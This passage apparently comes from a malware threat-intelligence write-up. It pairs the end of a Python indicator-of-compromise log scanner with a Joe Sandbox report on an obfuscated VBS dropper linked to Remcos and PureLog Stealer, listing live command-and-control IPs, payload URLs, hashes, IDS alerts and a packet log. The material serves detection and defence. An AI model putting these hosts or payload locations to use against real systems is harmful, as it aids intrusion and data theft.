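

def scan_conn(lines):
    """Return (line_no, src, reason) for every connection record that hits an IOC."""
    hits = []
    for n, line in enumerate(lines, 1):
        _ts, src, _sport, dst, dport, _proto = line.split()
        reason = check_conn(dst, int(dport))
        if reason:
            hits.append((n, src, reason))
    return hits


if __name__ == "__main__":
    for hit in scan_http(HTTP_LOG) + scan_conn(CONN_LOG):
        print(hit)
```

geoplugin.net/json.gp, which the report shows in RegAsm.exe memory with a safe reputation, is left out of the indicator set on purpose: it is a public geolocation API, so it is better used as a correlation indicator alongside a hit on one of the entries above than as a block-list entry.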
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1523832
                      Start date and time:2024-10-02 05:28:25 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 52s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:5fKvwnCAeC.vbs
                      renamed because original name is a hash value
                      Original Sample Name:f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.expl.evad.winVBS@8/6@1/3
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 93%
                      • Number of executed functions: 41
                      • Number of non-executed functions: 209
                      Cookbook Comments:
                      • Found application associated with file extension: .vbs
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 7484 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 8120 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:29:19 | API Interceptor | 46x Sleep call for process: powershell.exe modified
23:29:59 | API Interceptor | 2117020x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.90.89.123
• gcnmTxDXTo.rtf | malicious | Remcos, PureLog Stealer | 45.90.89.123/2117/RMCCF.txt
• xnHel.rtf | malicious | Remcos | 45.90.89.123/421/UNOST.txt
45.90.89.98
• AMG Cargo Logistic.docx | malicious | Remcos
• factura proforma .docx.doc | malicious | Remcos
• AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer
• gcnmTxDXTo.rtf | malicious | Remcos, PureLog Stealer
• 17269374062ef5cc5f064187ae053742f15ea11eaf7fe116e75df3551c4709ce78e8f1419a932.dat-decoded.exe | malicious | Remcos
• 1726170845fe5c472375696bf668b3b528e9effd5f9dfb1a2108bcc6e243a091f1afc5c794629.dat-decoded.exe | malicious | Remcos
• xnHel.rtf | malicious | Remcos
• PO FT-151-2024 PETROMAT.xls | malicious | Remcos
• August Shipment - Inv No. 041.xls | malicious | Remcos
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos
207.241.227.240
• 1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer
• aK7smea2Vv.vbs | malicious | PureLog Stealer
• vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer
• f4576JaIo9.vbs | malicious | PureLog Stealer
• 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer
• qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer
• ZJbugHcHda.vbs | malicious | PureLog Stealer
• 0BO4n723Q8.vbs | malicious | PureLog Stealer
• PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ia600100.us.archive.org
• 1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• aK7smea2Vv.vbs | malicious | PureLog Stealer | 207.241.227.240
• vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• f4576JaIo9.vbs | malicious | PureLog Stealer | 207.241.227.240
• 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer | 207.241.227.240
• qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• ZJbugHcHda.vbs | malicious | PureLog Stealer | 207.241.227.240
• 0BO4n723Q8.vbs | malicious | PureLog Stealer | 207.241.227.240
• PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | 207.241.227.240
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 207.241.227.240
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CMCSUS (listed twice in the report, once for each of the two contacted CMCSUS IPs 45.90.89.123 and 45.90.89.98; the identical block is shown once here)
• Deolane-Video-PDF.vbs | malicious | Unknown | 45.89.247.53
• Odeme_belgesi.exe | malicious | Lokibot | 45.66.231.242
• m7DmyQOKD7.exe | malicious | RHADAMANTHYS | 45.66.231.126
• AMG Cargo Logistic.docx | malicious | Remcos | 45.90.89.98
• factura proforma .docx.doc | malicious | Remcos | 45.90.89.98
• SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe | malicious | Remcos | 45.66.231.90
• l.exe | malicious | Unknown | 45.66.231.185
• winx86.exe | malicious | Unknown | 45.66.231.185
• AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 45.90.89.98
• 5qcJn1lfO5.rtf | malicious | Remcos, PureLog Stealer | 45.89.247.65
INTERNET-ARCHIVEUS
• 1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• aK7smea2Vv.vbs | malicious | PureLog Stealer | 207.241.227.240
• vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• f4576JaIo9.vbs | malicious | PureLog Stealer | 207.241.227.240
• 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer | 207.241.227.240
• qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• ZJbugHcHda.vbs | malicious | PureLog Stealer | 207.241.227.240
• 0BO4n723Q8.vbs | malicious | PureLog Stealer | 207.241.227.240
• PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | 207.241.227.240
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 207.241.227.240
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint)
• 1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• uLfuBVyZFV.vbs | malicious | Unknown | 207.241.227.240
• aK7smea2Vv.vbs | malicious | PureLog Stealer | 207.241.227.240
• vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• f4576JaIo9.vbs | malicious | PureLog Stealer | 207.241.227.240
• WW8kzvnphl.vbs | malicious | Unknown | 207.241.227.240
• 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer | 207.241.227.240
• qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 207.241.227.240
• 2THp7fwNQD.vbs | malicious | Unknown | 207.241.227.240
• iJEK0xwucj.vbs | malicious | Unknown | 207.241.227.240
                                                              No context
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllulh49//lz:NllUu9//
                                                              MD5:AADE84B9650AB09D8DC304B168D6D555
                                                              SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                                              SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                                              SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:@...e................................................@..........
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
Three further files dropped by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe are byte-identical to the file above (same 60-byte size, entropy, SSDEEP, MD5, SHA1, SHA-256 and SHA-512; Malicious: false). The report gives Reputation: high, very likely benign file for one of them and no reputation entry for the other two. This content is the probe script PowerShell writes on start-up to test whether an AppLocker or WDAC policy enforces script lockdown, so one copy per launched PowerShell host is expected and is not attributable to the sample.
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):144
                                                              Entropy (8bit):6.723642622925031
                                                              Encrypted:false
                                                              SSDEEP:3:9KVfpHGzVFx1pK9kbpqborWgY2BJKXvsnCXFblmmaxqjGdjeRJFIg429vx9Bnh:sBHGzZ1k9hborYmJuaCXFRRaw2a22l1h
                                                              MD5:DCF1DB117B36197409F895449AC386F0
                                                              SHA1:13EAA237AF3600BAF0313CA7434C03BAEA9051AD
                                                              SHA-256:A46C7C812A00D370A5FE4BCC1D52C07F3F3AC5FB2C316056AF15194BF182BBB6
                                                              SHA-512:A696E8027F3786A617CBF7E2296671CD509F3B3E03148AC22B871BFCA0447E7B7728C85DAF8A4BF36815F754240255422C928E0DD3B7647CC3D559A4233F70B6
                                                              Malicious:false
                                                              Preview:.=.........7.@..FL.X.y.v..$..C..>....IYn..E....4[.......r.I.Y..5f.'...>.LC.Z..?r.`kH...E;1M..yc8..d.8t3+ ......4.....Re.../.x......w.i.
                                                              File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Entropy (8bit):3.769827058226355
                                                              TrID:
                                                              • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                              • MP3 audio (1001/1) 32.22%
                                                              • Lumena CEL bitmap (63/63) 2.03%
                                                              • Corel Photo Paint (41/41) 1.32%
                                                              File name:5fKvwnCAeC.vbs
                                                              File size:290'064 bytes
                                                              MD5:0c6c4542c1abc5fc3d5eab3e4ab3793a
                                                              SHA1:288dfb240061530c2c73ae4183b7330623e94a69
                                                              SHA256:f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41
                                                              SHA512:7c3e22629060d8b18f1e88cbcb946d470599ac14699c75a7c1bf5cec0e174b8b3552eb6ec580defa747cb4cd5d9bfcc56e4ee9aa3dd366ed4272f88718ed8e2b
                                                              SSDEEP:6144:krHUuR5e0zLMcgGkkurXmTX/lb+rsb4Okiy+3kPvvA:kr0uR5e0nMc/kLrWTX/lb+rsb4Okiy47
                                                              TLSH:5854181225EA7008F1F32F575AF955F94F6BB9652A39821D644C0B0E1BE3E80CE51BB3
                                                              File Content Preview:..W.Z.x.N.W.m.n.i.k.G.p.v.W.o.K.q.O.c.k.B.L.K.i.U.Z.i.L.L.p.m. .=. .".i.b.b.K.e.G.e.R.W.r.B.c.U.e.B.W.N.c.W.h.m.L.I.C.R.f.n.o.K.P.".....e.O.L.W.T.L.a.i.o.z.c.z.d.k.Z.I.P.L.t.o.o.G.L.q.p.m.G.e.R.W. .=. .".L.g.c.W.q.k.N.g.h.R.o.L.U.i.r.a.R.K.K.A.P.G.d.n.g.z
                                                              Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T05:29:12.457573+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 60901 | 45.90.89.98 | 8243 | TCP
2024-10-02T05:29:27.935861+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 45.90.89.123 | 80 | 192.168.2.10 | 49707 | TCP
2024-10-02T05:29:27.935861+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 45.90.89.123 | 80 | 192.168.2.10 | 49707 | TCP
2024-10-02T05:29:50.329695+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 49708 | 45.90.89.98 | 8243 | TCP
2024-10-02T05:30:12.684380+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 49713 | 45.90.89.98 | 8243 | TCP
2024-10-02T05:30:35.061345+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 60898 | 45.90.89.98 | 8243 | TCP
2024-10-02T05:30:57.500976+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 60899 | 45.90.89.98 | 8243 | TCP
2024-10-02T05:31:19.894305+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 60900 | 45.90.89.98 | 8243 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Oct 2, 2024 05:29:23.416233063 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.416245937 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.416318893 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.416886091 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.416902065 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.417010069 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.417020082 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.417068005 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.482647896 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.482666969 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.482944012 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.482959032 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.483026981 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.483372927 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.483400106 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.483485937 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.483485937 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.483493090 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.483552933 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.549372911 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.549397945 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.549554110 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.549566984 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.549617052 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.549762964 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.549779892 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.549829960 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.549835920 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.549881935 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.615262032 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.615283966 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.615478992 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.615487099 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.615572929 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.615993023 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.616008997 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.616055012 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.616060019 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.616077900 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.616113901 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.681529045 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.681550026 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.681708097 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.681714058 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.681765079 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.682296038 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.682310104 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.682380915 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.682384968 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.682436943 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.747792006 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.747817993 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.747908115 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.747926950 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.747956038 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.748008966 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.748548031 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.748569012 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.748609066 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.748614073 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.748637915 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.748692036 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.813968897 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.813990116 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.814104080 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.814115047 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.814178944 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.814608097 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.814625978 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.814716101 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.814721107 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.814755917 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.814755917 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.876523018 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.876550913 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.876708031 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.876724005 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.876804113 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.880647898 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.880664110 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.880753994 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.880760908 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.880772114 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.880831957 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.942802906 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.942823887 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.943016052 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.943026066 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.943078995 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.946615934 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.946633101 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.946727991 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.946733952 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.946809053 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.947335005 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.947350025 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.947410107 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:23.947415113 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:23.947472095 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.012959957 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.012979031 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.013204098 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.013216972 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.013278961 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.013592958 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.013608932 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.013679028 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.013684988 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.013761044 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.079267979 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.079287052 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.079428911 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.079437017 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.079523087 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.079783916 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.079799891 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.079900980 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.079900980 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.079906940 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.079961061 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.141693115 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.141716003 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.141845942 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.141855001 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.141915083 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.145757914 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.145775080 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.145961046 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.145967960 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.146009922 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.146347046 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.146363974 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.146425962 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.146430969 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.146490097 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.211935043 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.211961985 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.212038040 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.212045908 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.212136030 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.212136030 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.212649107 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.212666035 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.212754965 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.212760925 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.212832928 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.278104067 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.278131962 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.278335094 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.278350115 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.278424978 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.278690100 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.278706074 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.278764963 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.278773069 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.278873920 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.340646982 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.340672970 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.340800047 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.340818882 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.340883017 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.344490051 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.344512939 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.344655037 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.344679117 CEST44349706207.241.227.240192.168.2.10
